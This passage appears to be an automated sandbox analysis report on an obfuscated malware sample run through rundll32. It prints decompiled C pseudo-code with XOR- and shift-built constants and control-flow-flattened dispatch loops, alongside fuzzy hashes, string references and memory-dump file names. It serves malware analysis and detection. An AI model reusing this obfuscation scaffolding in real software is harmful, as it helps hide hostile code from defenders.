Opcode Fuzzy Hash: 134069770a31948d234980a50910f030b90c1d84e754e185a23ca528d1d7733d
Instruction Fuzzy Hash: 2BF122715083809FE368CF25C989A5BBBE1FFC4758F50891DF29A862A0D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002093C9, Relevance: 15.3, Strings: 12, Instructions: 259
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002093C9() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				signed int _v1052;
				signed int _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				unsigned int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				void* _t291;
				void* _t297;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				void* _t347;
				signed int* _t351;

				_t351 =  &_v1168;
				_v1044 = _v1044 & 0x00000000;
				_v1048 = 0x516598;
				_v1108 = 0x3b16;
				_v1108 = _v1108 * 0x74;
				_t347 = 0x311804be;
				_v1108 = _v1108 ^ 0xd50e416f;
				_v1108 = _v1108 ^ 0xd514c4cb;
				_v1084 = 0x7213;
				_v1084 = _v1084 + 0xffff1ce9;
				_v1084 = _v1084 ^ 0xffffb376;
				_v1076 = 0x942d;
				_v1076 = _v1076 + 0x8243;
				_v1076 = _v1076 ^ 0x00015e40;
				_v1160 = 0xefc2;
				_v1160 = _v1160 + 0xffff37ee;
				_v1160 = _v1160 ^ 0xc712f7cb;
				_t301 = 0x1e;
				_v1160 = _v1160 / _t301;
				_v1160 = _v1160 ^ 0x06a2c559;
				_v1168 = 0x8bc8;
				_v1168 = _v1168 >> 0xd;
				_v1168 = _v1168 << 0xd;
				_t302 = 0xb;
				_v1168 = _v1168 * 0x79;
				_v1168 = _v1168 ^ 0x003cfea4;
				_v1092 = 0xa545;
				_v1092 = _v1092 >> 9;
				_v1092 = _v1092 ^ 0x00005d7c;
				_v1140 = 0xa869;
				_v1140 = _v1140 + 0x7fc8;
				_v1140 = _v1140 / _t302;
				_v1140 = _v1140 ^ 0x00006e61;
				_v1116 = 0x2c70;
				_v1116 = _v1116 << 0xf;
				_v1116 = _v1116 << 6;
				_v1116 = _v1116 ^ 0x8e00790e;
				_v1068 = 0x820b;
				_v1068 = _v1068 << 2;
				_v1068 = _v1068 ^ 0x00020295;
				_v1052 = 0x1207;
				_t303 = 0x11;
				_v1052 = _v1052 * 0x74;
				_v1052 = _v1052 ^ 0x00087ea5;
				_v1072 = 0x355d;
				_v1072 = _v1072 << 8;
				_v1072 = _v1072 ^ 0x00352c0b;
				_v1080 = 0x10d0;
				_v1080 = _v1080 << 0xd;
				_v1080 = _v1080 ^ 0x021a6542;
				_v1088 = 0x6c30;
				_v1088 = _v1088 >> 8;
				_v1088 = _v1088 ^ 0x00000016;
				_v1152 = 0xa8ea;
				_v1152 = _v1152 >> 0xf;
				_v1152 = _v1152 + 0xb411;
				_v1152 = _v1152 + 0x3cf;
				_v1152 = _v1152 ^ 0x0000e46f;
				_v1096 = 0x75ec;
				_v1096 = _v1096 + 0xffff70cd;
				_v1096 = _v1096 ^ 0xfffffc52;
				_v1104 = 0x93ae;
				_v1104 = _v1104 / _t303;
				_v1104 = _v1104 + 0xffff015e;
				_v1104 = _v1104 ^ 0xffff7730;
				_v1056 = 0xbdf9;
				_v1056 = _v1056 ^ 0xd4f8d9ff;
				_v1056 = _v1056 ^ 0xd4f80819;
				_v1128 = 0xf240;
				_v1128 = _v1128 + 0xffffadf5;
				_t304 = 0x6e;
				_v1128 = _v1128 * 0x47;
				_v1128 = _v1128 ^ 0x002c66a2;
				_v1060 = 0xbfc0;
				_v1060 = _v1060 >> 3;
				_v1060 = _v1060 ^ 0x00003168;
				_v1164 = 0xfebb;
				_v1164 = _v1164 + 0xffff52f0;
				_v1164 = _v1164 / _t304;
				_t305 = 0x5a;
				_v1164 = _v1164 / _t305;
				_v1164 = _v1164 ^ 0x00003ceb;
				_v1136 = 0x6ebb;
				_v1136 = _v1136 >> 0xe;
				_v1136 = _v1136 << 0xe;
				_v1136 = _v1136 ^ 0x00005f7f;
				_v1120 = 0xe73f;
				_v1120 = _v1120 ^ 0x98e7fdaf;
				_v1120 = _v1120 << 3;
				_v1120 = _v1120 ^ 0xc7388f6f;
				_v1112 = 0x84f4;
				_v1112 = _v1112 | 0xf7194f1a;
				_v1112 = _v1112 + 0xffffc2ac;
				_v1112 = _v1112 ^ 0xf719aa5d;
				_v1156 = 0x76fc;
				_v1156 = _v1156 + 0xffff5f4d;
				_v1156 = _v1156 + 0xffffa6b8;
				_v1156 = _v1156 + 0xd873;
				_v1156 = _v1156 ^ 0x000078a0;
				_v1124 = 0x47e1;
				_t306 = 0x21;
				_v1124 = _v1124 / _t306;
				_v1124 = _v1124 >> 0xd;
				_v1124 = _v1124 ^ 0x000072fc;
				_v1148 = 0x5566;
				_v1148 = _v1148 + 0xffff28de;
				_t307 = 0x31;
				_v1148 = _v1148 * 0x4f;
				_v1148 = _v1148 << 8;
				_v1148 = _v1148 ^ 0xd7f6da53;
				_v1132 = 0xf4f2;
				_v1132 = _v1132 << 3;
				_v1132 = _v1132 + 0x5d4f;
				_v1132 = _v1132 ^ 0x00082308;
				_v1100 = 0x806a;
				_v1100 = _v1100 >> 9;
				_v1100 = _v1100 / _t307;
				_v1100 = _v1100 ^ 0x00006f90;
				_v1144 = 0x33d6;
				_v1144 = _v1144 >> 9;
				_v1144 = _v1144 >> 4;
				_v1144 = _v1144 | 0x773178e8;
				_v1144 = _v1144 ^ 0x7731353c;
				_v1064 = 0x1023;
				_v1064 = _v1064 + 0x46cd;
				_v1064 = _v1064 ^ 0x00001a8d;
				_t291 = E00204237();
				do {
					while(_t347 != 0x7d8ec07) {
						if(_t347 == 0x1eca11d1) {
							return E00203D7C( &_v520, __eflags, _v1144, _v1064,  &_v1040);
						}
						if(_t347 == 0x311804be) {
							_t347 = 0x7d8ec07;
							continue;
						}
						_t357 = _t347 - 0x3581d11e;
						if(_t347 != 0x3581d11e) {
							goto L8;
						}
						_push(0x1f1050);
						_push(_v1056);
						_t297 = E0020BF25(_v1096, _v1104, _t357);
						E002064EC(E00207B6B(), _t357, _t297, _v1164, 0x104,  *0x2121b0 + 0x10,  *0x2121b0 + 0x234, _v1136, _v1120, _v1112);
						_t291 = E0020C5F7(_v1156, _v1124, _v1148, _v1132, _t297);
						_t351 =  &(_t351[0xd]);
						_t347 = 0x1eca11d1;
					}
					_push(0x1f1000);
					_push(_v1168);
					E002063BF(E0020BF25(_v1076, _v1160, __eflags), __eflags, _v1140, _v1116,  &_v1040,  *0x2121b0 + 0x234, _v1068,  *0x2121b0 + 0x234,  *0x2121b0 + 0x10, _v1052);
					_t291 = E0020C5F7(_v1072, _v1080, _v1088, _v1152, _t292);
					_t351 =  &(_t351[0xb]);
					_t347 = 0x3581d11e;
					L8:
					__eflags = _t347 - 0x3fe593;
				} while (__eflags != 0);
				return _t291;
			}

0x002093c9
0x002093cf
0x002093d6
0x002093de
0x002093ef
0x002093f3
0x002093f8
0x00209400
0x00209408
0x00209410
0x00209418
0x00209420
0x00209428
0x00209430
0x00209438
0x00209440
0x00209448
0x00209456
0x0020945b
0x00209461
0x00209469
0x00209471
0x00209476
0x00209480
0x00209483
0x00209487
0x0020948f
0x00209497
0x0020949c
0x002094a4
0x002094ac
0x002094bc
0x002094c0
0x002094c8
0x002094d0
0x002094d5
0x002094da
0x002094e2
0x002094ea
0x002094ef
0x002094f7
0x0020950a
0x0020950b
0x00209512
0x0020951d
0x00209525
0x0020952a
0x00209532
0x0020953a
0x0020953f
0x00209547
0x0020954f
0x00209554
0x00209559
0x00209561
0x00209566
0x0020956e
0x00209576
0x0020957e
0x00209586
0x0020958e
0x00209596
0x002095a4
0x002095a8
0x002095b2
0x002095ba
0x002095c5
0x002095d0
0x002095db
0x002095e3
0x002095f2
0x002095f5
0x002095f9
0x00209601
0x0020960c
0x00209614
0x0020961f
0x00209627
0x00209637
0x0020963f
0x00209644
0x0020964a
0x00209652
0x0020965a
0x0020965f
0x00209664
0x0020966c
0x00209674
0x0020967c
0x00209681
0x00209689
0x00209691
0x00209699
0x002096a1
0x002096a9
0x002096b1
0x002096b9
0x002096c1
0x002096c9
0x002096d1
0x002096dd
0x002096e2
0x002096e8
0x002096ed
0x002096f5
0x002096fd
0x0020970a
0x0020970b
0x0020970f
0x00209714
0x0020971c
0x00209724
0x00209729
0x00209731
0x00209739
0x00209741
0x0020974c
0x00209750
0x00209758
0x00209760
0x00209765
0x0020976a
0x00209772
0x0020977a
0x00209782
0x0020978a
0x0020979a
0x002097ae
0x002097ae
0x002097b8
0x00000000
0x00209900
0x002097c4
0x00209852
0x00000000
0x00209852
0x002097ca
0x002097cc
0x00000000
0x00000000
0x002097d2
0x002097d7
0x002097e6
0x0020982d
0x00209843
0x00209848
0x0020984b
0x0020984b
0x00209859
0x0020985e
0x002098a9
0x002098c8
0x002098cd
0x002098d0
0x002098d2
0x002098d2
0x002098d2
0x00000000

Strings

0l, xrefs: 00209547
an, xrefs: 002094C0
<51w, xrefs: 00209772
]5, xrefs: 0020951D
<, xrefs: 0020964A
o, xrefs: 00209576
?, xrefs: 0020966C
p,, xrefs: 002094C8
u, xrefs: 0020957E
G, xrefs: 002096D1
O], xrefs: 00209729
h1, xrefs: 00209614

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 0l$<51w$?$O]$]5$an$h1$o$p,$<$G$u
API String ID: 0-3006474019
Opcode ID: d6a7ac212cc15f38fb76624257064ae32744fd01244a10ac77a4247156c47f16
Instruction ID: 701cd8e69e0636cabae37c392b35f03585d4be8d563100504b7209bd1a4bf730
Opcode Fuzzy Hash: d6a7ac212cc15f38fb76624257064ae32744fd01244a10ac77a4247156c47f16
Instruction Fuzzy Hash: 9ED131725187819FE368CF24C88954BFBF1BBC4748F208A1CF5D9962A1D7B98958CF42

Uniqueness

Uniqueness Score: -1.00%

Function 002A893D, Relevance: 15.3, Strings: 12, Instructions: 259COMMON

Download Yara Rule

Strings

an, xrefs: 002A8A34
u, xrefs: 002A8AF2
o, xrefs: 002A8AEA
O], xrefs: 002A8C9D
<51w, xrefs: 002A8CE6
p,, xrefs: 002A8A3C
?, xrefs: 002A8BE0
]5, xrefs: 002A8A91
0l, xrefs: 002A8ABB
<, xrefs: 002A8BBE
G, xrefs: 002A8C45
h1, xrefs: 002A8B88

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 0l$<51w$?$O]$]5$an$h1$o$p,$<$G$u
API String ID: 0-3006474019
Opcode ID: e8a96aed94058155cecfcfea6c7fbf983d9211dc3c2061eec7da38beef13e263
Instruction ID: 2deb1bb5e1fe219d26e579d86b6c7945141d9b255078317c9851f9f18e5d399b
Opcode Fuzzy Hash: e8a96aed94058155cecfcfea6c7fbf983d9211dc3c2061eec7da38beef13e263
Instruction Fuzzy Hash: 65D132715187819FE368CF24C98954BFBE1BBC5748F208A1CF5D5862A0DBB58948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001F6BC0, Relevance: 15.3, Strings: 12, Instructions: 252
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E001F6BC0() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _t254;
				intOrPtr _t256;
				intOrPtr _t258;
				void* _t259;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				void* _t299;
				char _t303;
				signed int* _t304;
				void* _t306;

				_t304 =  &_v116;
				_v56 = 0x84b9;
				_v56 = _v56 << 0xb;
				_v56 = _v56 + 0x5ea0;
				_v56 = _v56 ^ 0x0426650f;
				_v108 = 0x299e;
				_v108 = _v108 >> 8;
				_v108 = _v108 >> 0xa;
				_v108 = _v108 >> 0xc;
				_v108 = _v108 ^ 0x000045b0;
				_v112 = 0xab11;
				_v112 = _v112 << 0x10;
				_v112 = _v112 + 0xffff3408;
				_v112 = _v112 << 6;
				_v112 = _v112 ^ 0xc40d3ae9;
				_v80 = 0xee41;
				_t261 = 0x22;
				_v80 = _v80 / _t261;
				_v80 = _v80 ^ 0x83f67a84;
				_t259 = 0;
				_v80 = _v80 ^ 0x83f65317;
				_t299 = 0x23ec3b81;
				_v116 = 0xfedd;
				_v116 = _v116 + 0xd1e5;
				_t262 = 0x7f;
				_v116 = _v116 / _t262;
				_v116 = _v116 << 0xc;
				_v116 = _v116 ^ 0x003ad050;
				_v44 = 0xeb09;
				_t263 = 0x2e;
				_v44 = _v44 * 0x66;
				_v44 = _v44 ^ 0x005de128;
				_v48 = 0x515a;
				_v48 = _v48 | 0x7fc990a4;
				_v48 = _v48 ^ 0x7fc9cd68;
				_v84 = 0xaabb;
				_v84 = _v84 >> 1;
				_v84 = _v84 * 0x5b;
				_v84 = _v84 ^ 0x001e5e5d;
				_v96 = 0x583;
				_v96 = _v96 + 0xd9a1;
				_v96 = _v96 / _t263;
				_v96 = _v96 + 0x3e5;
				_v96 = _v96 ^ 0x000008a1;
				_v100 = 0x8d71;
				_t264 = 0x53;
				_v100 = _v100 * 0xd;
				_v100 = _v100 >> 4;
				_v100 = _v100 / _t264;
				_v100 = _v100 ^ 0x00004ab6;
				_v76 = 0xeaf8;
				_v76 = _v76 << 0xb;
				_v76 = _v76 << 5;
				_v76 = _v76 ^ 0xeaf83e17;
				_v104 = 0xfdf7;
				_v104 = _v104 + 0xffff8125;
				_v104 = _v104 >> 0xc;
				_v104 = _v104 << 2;
				_v104 = _v104 ^ 0x00004c62;
				_v40 = 0x8162;
				_v40 = _v40 | 0xc691c83f;
				_v40 = _v40 ^ 0xc691a24d;
				_v72 = 0x9e4d;
				_v72 = _v72 << 0xc;
				_v72 = _v72 + 0xffff6436;
				_v72 = _v72 ^ 0x09e41bc8;
				_v92 = 0x78eb;
				_v92 = _v92 >> 0xa;
				_v92 = _v92 | 0xec9d9334;
				_v92 = _v92 << 0xc;
				_v92 = _v92 ^ 0xd933d049;
				_v36 = 0x856f;
				_t265 = 0x39;
				_v36 = _v36 / _t265;
				_v36 = _v36 ^ 0x00001c57;
				_v60 = 0x6631;
				_v60 = _v60 >> 2;
				_v60 = _v60 + 0xffffdfe4;
				_v60 = _v60 ^ 0xffffcf25;
				_v64 = 0x3444;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 ^ 0x00000359;
				_v68 = 0xe444;
				_t266 = 0x50;
				_v68 = _v68 / _t266;
				_v68 = _v68 + 0x16a0;
				_v68 = _v68 ^ 0x00006446;
				_v32 = 0xb62e;
				_v32 = _v32 >> 7;
				_v32 = _v32 ^ 0x00006ec1;
				_v52 = 0x9375;
				_v52 = _v52 >> 8;
				_t267 = 0x71;
				_v52 = _v52 * 0xb;
				_v52 = _v52 ^ 0x00007061;
				_v88 = 0x468b;
				_v88 = _v88 / _t267;
				_v88 = _v88 * 0x47;
				_v88 = _v88 >> 2;
				_v88 = _v88 ^ 0x0000270a;
				_t298 = _v28;
				_t303 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t306 = _t299 - 0x23ec3b81;
						if(_t306 > 0) {
							break;
						}
						if(_t306 == 0) {
							_t299 = 0x2b5ba3b6;
							continue;
						}
						if(_t299 == 0x591e35e) {
							E0020B981(_v40, _v8 + 1,  *0x2121b0 + 0x10, _v12, _v72, _v92);
							_t304 =  &(_t304[4]);
							_t259 = 1;
							_t299 = 0x3378ea2d;
							 *((intOrPtr*)( *0x2121b0)) = _v16;
							continue;
						}
						if(_t299 == 0x5f14f0f) {
							_t254 = E0020CAA0( &_v24, _v96,  &_v16, _v100, _v76, _v104);
							_t304 =  &(_t304[4]);
							asm("sbb esi, esi");
							_t299 = ( ~_t254 & 0xd218f931) + 0x3378ea2d;
							continue;
						}
						if(_t299 == 0xba7b4d4) {
							_t256 = E0020B806(_v108, _t303, _v112, _v80,  &_v28);
							_t298 = _t256;
							_t304 =  &(_t304[3]);
							if(_t256 == 0) {
								L23:
								return _t259;
							}
							_t299 = 0x176f3fd8;
							continue;
						}
						if(_t299 != 0x176f3fd8) {
							goto L20;
						} else {
							_t299 = 0x2e66d4aa;
							if(_v28 > 2) {
								_t258 = E00205AB8(_v116, _v44, _v48,  *((intOrPtr*)(_t298 + 8)),  &_v20, _v84);
								_t304 =  &(_t304[4]);
								_v24 = _t258;
								if(_t258 != 0) {
									_t299 = 0x5f14f0f;
								}
							}
							continue;
						}
					}
					if(_t299 == 0x2b5ba3b6) {
						_t303 = E0020B8E7();
						_t299 = 0xba7b4d4;
						goto L20;
					}
					if(_t299 == 0x2e66d4aa) {
						E001F7BE0(_v32, _t298, _v52, _v88);
						goto L23;
					}
					if(_t299 != 0x3378ea2d) {
						goto L20;
					}
					E001F91CD(_v36, _v60, _v64, _v24, _v68);
					_t304 =  &(_t304[3]);
					_t299 = 0x2e66d4aa;
					goto L1;
					L20:
				} while (_t299 != 0x16656518);
				goto L23;
			}

0x001f6bc0
0x001f6bc3
0x001f6bcd
0x001f6bd2
0x001f6bda
0x001f6be2
0x001f6bea
0x001f6bef
0x001f6bf4
0x001f6bf9
0x001f6c01
0x001f6c09
0x001f6c0e
0x001f6c16
0x001f6c1b
0x001f6c23
0x001f6c35
0x001f6c3a
0x001f6c40
0x001f6c48
0x001f6c4a
0x001f6c52
0x001f6c57
0x001f6c5f
0x001f6c6b
0x001f6c70
0x001f6c76
0x001f6c7b
0x001f6c83
0x001f6c90
0x001f6c93
0x001f6c97
0x001f6c9f
0x001f6ca7
0x001f6caf
0x001f6cb7
0x001f6cbf
0x001f6cc8
0x001f6ccc
0x001f6cd4
0x001f6cdc
0x001f6cec
0x001f6cf0
0x001f6cf8
0x001f6d00
0x001f6d0d
0x001f6d0e
0x001f6d12
0x001f6d1d
0x001f6d21
0x001f6d29
0x001f6d31
0x001f6d36
0x001f6d3b
0x001f6d43
0x001f6d4b
0x001f6d53
0x001f6d58
0x001f6d5d
0x001f6d65
0x001f6d6f
0x001f6d77
0x001f6d7f
0x001f6d87
0x001f6d8c
0x001f6d94
0x001f6d9c
0x001f6da4
0x001f6da9
0x001f6db1
0x001f6db6
0x001f6dbe
0x001f6dcc
0x001f6dd1
0x001f6dd7
0x001f6ddf
0x001f6de7
0x001f6dec
0x001f6df4
0x001f6dfc
0x001f6e04
0x001f6e09
0x001f6e0e
0x001f6e16
0x001f6e22
0x001f6e27
0x001f6e2d
0x001f6e35
0x001f6e3d
0x001f6e45
0x001f6e4a
0x001f6e52
0x001f6e5a
0x001f6e64
0x001f6e65
0x001f6e69
0x001f6e71
0x001f6e7f
0x001f6e88
0x001f6e8c
0x001f6e91
0x001f6e99
0x001f6e9d
0x001f6e9d
0x001f6ea1
0x001f6ea1
0x001f6ea1
0x001f6ea1
0x001f6ea7
0x00000000
0x00000000
0x001f6ead
0x001f6fc6
0x00000000
0x001f6fc6
0x001f6eb9
0x001f6fa3
0x001f6fb6
0x001f6fb9
0x001f6fba
0x001f6fbf
0x00000000
0x001f6fbf
0x001f6ec5
0x001f6f5e
0x001f6f63
0x001f6f6a
0x001f6f72
0x00000000
0x001f6f72
0x001f6ecd
0x001f6f29
0x001f6f2e
0x001f6f30
0x001f6f35
0x001f7044
0x001f704a
0x001f704a
0x001f6f3b
0x00000000
0x001f6f3b
0x001f6ed5
0x00000000
0x001f6edb
0x001f6ee0
0x001f6ee5
0x001f6eff
0x001f6f04
0x001f6f07
0x001f6f0d
0x001f6f0f
0x001f6f0f
0x001f6f0d
0x00000000
0x001f6ee5
0x001f6ed5
0x001f6fd6
0x001f7017
0x001f7019
0x00000000
0x001f7019
0x001f6fde
0x001f703a
0x00000000
0x001f7040
0x001f6fe6
0x00000000
0x00000000
0x001f6ffc
0x001f7001
0x001f7004
0x00000000
0x001f701e
0x001f701e
0x00000000

Strings

bL, xrefs: 001F6D5D
', xrefs: 001F6E91
ZQ, xrefs: 001F6C9F
A, xrefs: 001F6C23
x, xrefs: 001F6D9C
-x3, xrefs: 001F6FE0
ap, xrefs: 001F6E69
Fd, xrefs: 001F6E35
-x3, xrefs: 001F6FBA
D4, xrefs: 001F6DFC
(], xrefs: 001F6C97
1f, xrefs: 001F6DDF

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: '$(]$-x3$-x3$1f$A$D4$Fd$ZQ$ap$bL$x
API String ID: 0-4015965578
Opcode ID: 49d2b09144adf3beb2785be124f12dde3c5d62f00ca4fc36e4a155f8953d4a7d
Instruction ID: 9be34f54f3fc3fe8e089565852b3d1f8ab8e80a2713340b625ff337d37838464
Opcode Fuzzy Hash: 49d2b09144adf3beb2785be124f12dde3c5d62f00ca4fc36e4a155f8953d4a7d
Instruction Fuzzy Hash: BAC140725083409FE718CF25C88A45BFBE2BBC4758F14891DF599A62A0D7B9D948CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00296134, Relevance: 15.3, Strings: 12, Instructions: 252COMMON

Download Yara Rule

Strings

-x3, xrefs: 0029652E
1f, xrefs: 00296353
ap, xrefs: 002963DD
bL, xrefs: 002962D1
-x3, xrefs: 00296554
ZQ, xrefs: 00296213
D4, xrefs: 00296370
', xrefs: 00296405
x, xrefs: 00296310
(], xrefs: 0029620B
A, xrefs: 00296197
Fd, xrefs: 002963A9

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: '$(]$-x3$-x3$1f$A$D4$Fd$ZQ$ap$bL$x
API String ID: 0-4015965578
Opcode ID: 0f95bac329467ba97e36d7738000d01f0fed8f60c8619c27c12f7f6a179d06be
Instruction ID: 207f84de754ef7dbe5b4221773230066f155db7638bb43d697aad030682902a2
Opcode Fuzzy Hash: 0f95bac329467ba97e36d7738000d01f0fed8f60c8619c27c12f7f6a179d06be
Instruction Fuzzy Hash: 51C183B25083419FD718CF25C88A40BFBE2BBC4758F54892DF499A62A0D7B9D958CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0029B5F1, Relevance: 14.0, Strings: 11, Instructions: 296COMMON

Download Yara Rule

Strings

2, xrefs: 0029B6A8
E2, xrefs: 0029B686
R&, xrefs: 0029B792
t, xrefs: 0029BB08
zR, xrefs: 0029B8EA
iv, xrefs: 0029B611
Ve, xrefs: 0029B77A
V9, xrefs: 0029B90A
hV, xrefs: 0029B902
o, xrefs: 0029B6E6
9C, xrefs: 0029B93F

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 2$9C$E2$R&$V9$Ve$hV$iv$t$zR$o
API String ID: 0-2805638000
Opcode ID: f1373f736c3736b23f75e149c52dfe0417b614d10bc8c0e245db7064e5c0ff0e
Instruction ID: 0beee1e92d43da3aa5b19d93f789ab924d896515520a3f47ad52245014f02937
Opcode Fuzzy Hash: f1373f736c3736b23f75e149c52dfe0417b614d10bc8c0e245db7064e5c0ff0e
Instruction Fuzzy Hash: 80E17372418382DFE759CF64D98A90BBBF0BB84718F60491DF99586270D7B18958CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0020B3FE, Relevance: 14.0, Strings: 11, Instructions: 209
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0020B3FE() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				unsigned int _v1136;
				void* _t216;
				void* _t229;
				intOrPtr _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				unsigned int* _t266;

				_t266 =  &_v1136;
				_v1052 = 0x59feef;
				_v1048 = 0x2a3fe0;
				_t229 = 0x3abfade2;
				_t258 = 0;
				_v1044 = 0;
				_v1096 = 0x3e7b;
				_v1096 = _v1096 << 8;
				_v1096 = _v1096 | 0x4b45bfac;
				_v1096 = _v1096 ^ 0x4b7f9484;
				_v1120 = 0xeeae;
				_v1120 = _v1120 + 0xffff949c;
				_v1120 = _v1120 + 0xffff26d2;
				_v1120 = _v1120 ^ 0xc3b4e966;
				_v1120 = _v1120 ^ 0x3c4b1d4d;
				_v1088 = 0x77a0;
				_v1088 = _v1088 | 0x40386f55;
				_v1088 = _v1088 << 0x10;
				_v1088 = _v1088 ^ 0x7ff5165c;
				_v1064 = 0xf0bf;
				_v1064 = _v1064 << 9;
				_v1064 = _v1064 ^ 0x01e162a5;
				_v1072 = 0x124d;
				_t259 = 0x72;
				_v1072 = _v1072 / _t259;
				_v1072 = _v1072 ^ 0x00002ee6;
				_v1128 = 0x5292;
				_v1128 = _v1128 << 8;
				_v1128 = _v1128 + 0xe9bf;
				_v1128 = _v1128 + 0x3238;
				_v1128 = _v1128 ^ 0x0053b92a;
				_v1136 = 0xc2f1;
				_v1136 = _v1136 + 0x6410;
				_v1136 = _v1136 >> 0xc;
				_v1136 = _v1136 + 0x63d1;
				_v1136 = _v1136 ^ 0x00000ac7;
				_v1112 = 0x7058;
				_t260 = 0x4b;
				_v1112 = _v1112 * 0xd;
				_v1112 = _v1112 << 6;
				_v1112 = _v1112 + 0x987c;
				_v1112 = _v1112 ^ 0x016df42c;
				_v1100 = 0x41a9;
				_v1100 = _v1100 + 0xffffec41;
				_v1100 = _v1100 + 0xffff9ba9;
				_v1100 = _v1100 ^ 0xffffd6d5;
				_v1104 = 0x872a;
				_v1104 = _v1104 / _t260;
				_v1104 = _v1104 >> 0x10;
				_v1104 = _v1104 ^ 0x0000287c;
				_v1080 = 0x8003;
				_v1080 = _v1080 | 0x7adfffb6;
				_v1080 = _v1080 ^ 0x7adf96d6;
				_v1084 = 0x5426;
				_v1084 = _v1084 + 0xe4e2;
				_v1084 = _v1084 ^ 0xc6a85055;
				_v1084 = _v1084 ^ 0xc6a96844;
				_v1092 = 0x916a;
				_v1092 = _v1092 >> 0x10;
				_v1092 = _v1092 | 0x14ea685d;
				_v1092 = _v1092 ^ 0x14ea6f72;
				_v1056 = 0x7cb0;
				_v1056 = _v1056 >> 7;
				_v1056 = _v1056 ^ 0x000061a1;
				_v1132 = 0x4cf9;
				_v1132 = _v1132 ^ 0x2fb41e14;
				_v1132 = _v1132 ^ 0xb509e885;
				_v1132 = _v1132 + 0x3858;
				_v1132 = _v1132 ^ 0x9abd8624;
				_v1124 = 0xb90b;
				_v1124 = _v1124 | 0x9d483c7c;
				_t261 = 0x31;
				_v1124 = _v1124 / _t261;
				_v1124 = _v1124 << 0x10;
				_v1124 = _v1124 ^ 0xbab966f1;
				_v1076 = 0x4837;
				_t262 = 0x28;
				_v1076 = _v1076 * 0x42;
				_v1076 = _v1076 ^ 0x39645d85;
				_v1076 = _v1076 ^ 0x3976b123;
				_v1060 = 0xa4fd;
				_v1060 = _v1060 / _t262;
				_v1060 = _v1060 ^ 0x00000d98;
				_v1068 = 0x96bf;
				_v1068 = _v1068 | 0xc49b968d;
				_v1068 = _v1068 ^ 0xc49bbea0;
				_v1108 = 0xf482;
				_v1108 = _v1108 + 0xffffa317;
				_v1108 = _v1108 | 0x011b1071;
				_v1108 = _v1108 << 2;
				_v1108 = _v1108 ^ 0x046e6bfd;
				_v1116 = 0x4fbc;
				_v1116 = _v1116 + 0xffff81fd;
				_v1116 = _v1116 + 0xffff31d8;
				_t263 = 5;
				_v1116 = _v1116 / _t263;
